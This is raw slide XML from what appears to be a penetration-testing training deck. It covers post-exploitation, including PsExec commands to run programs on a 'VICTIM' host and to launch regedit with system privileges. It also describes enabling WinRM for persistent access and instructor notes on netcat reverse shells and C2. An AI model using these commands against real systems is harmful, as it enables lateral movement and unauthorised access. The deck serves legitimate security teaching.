                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> option returns control to the attacker before the launching of calc.exe is completed:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>    &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>\\VICTIM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> -d -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> calc.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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You can also use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to edit registry values, which means applications can run with system privileges and have access to data that is normally locked. This is demonstrated in the following example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>   &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> -d -s regedit.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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dirty="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="740649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name="Slide 6">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274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: Best Practices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64698" y="349370"/>
            <a:ext cx="8704052" cy="4261825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Prior to teaching Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, the instructor should:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="169545" marR="0" lvl="0" indent="-169545" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>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a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Review the activities and assessments for this module.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="169545" indent="-169545" defTabSz="684213" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>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latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Try to include as many questions as possible to keep students engaged during</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>classroom presentation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="684213" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Topic 8.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Explain the concepts of bind and reverse shells and illustrate with examples.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Encourage the students to access the site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to know a full list of and documentation for all supported Windows commands released by Microsoft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Introduce the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> tool and show the students how this tool can be used to create bind and reverse shells. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Explain that the Meterpreter module of the Metasploit framework can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>perform numerous other post-exploitation tasks and can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>also be used to create bind and reverse shells.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Encourage the students to answer the 8.1.3 Practice about reverse and bind shells.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Explain the concept of command and control (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CnC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> or C2) systems and covert channel. Illustrate with some examples of C2 utilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Ask the students to answer the 8.1.5 Practice about types of C2 utilities.</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26691786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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>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dirty="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="1088571"/>
            <a:ext cx="9021277"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rgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Windows Remote Management (WinRM) for Post-Exploitation Tasks</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>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It gives you a legitimate way to connect to Windows systems.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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It is typically managed by Windows Group Policy (which is typically used for managing corporate Windows environments).</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> can be useful for post-exploitation activities. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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An attacker could enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to allow further connections to the compromised systems and maintain persistent access. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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You can easily enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> on a Windows system by using the following command:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
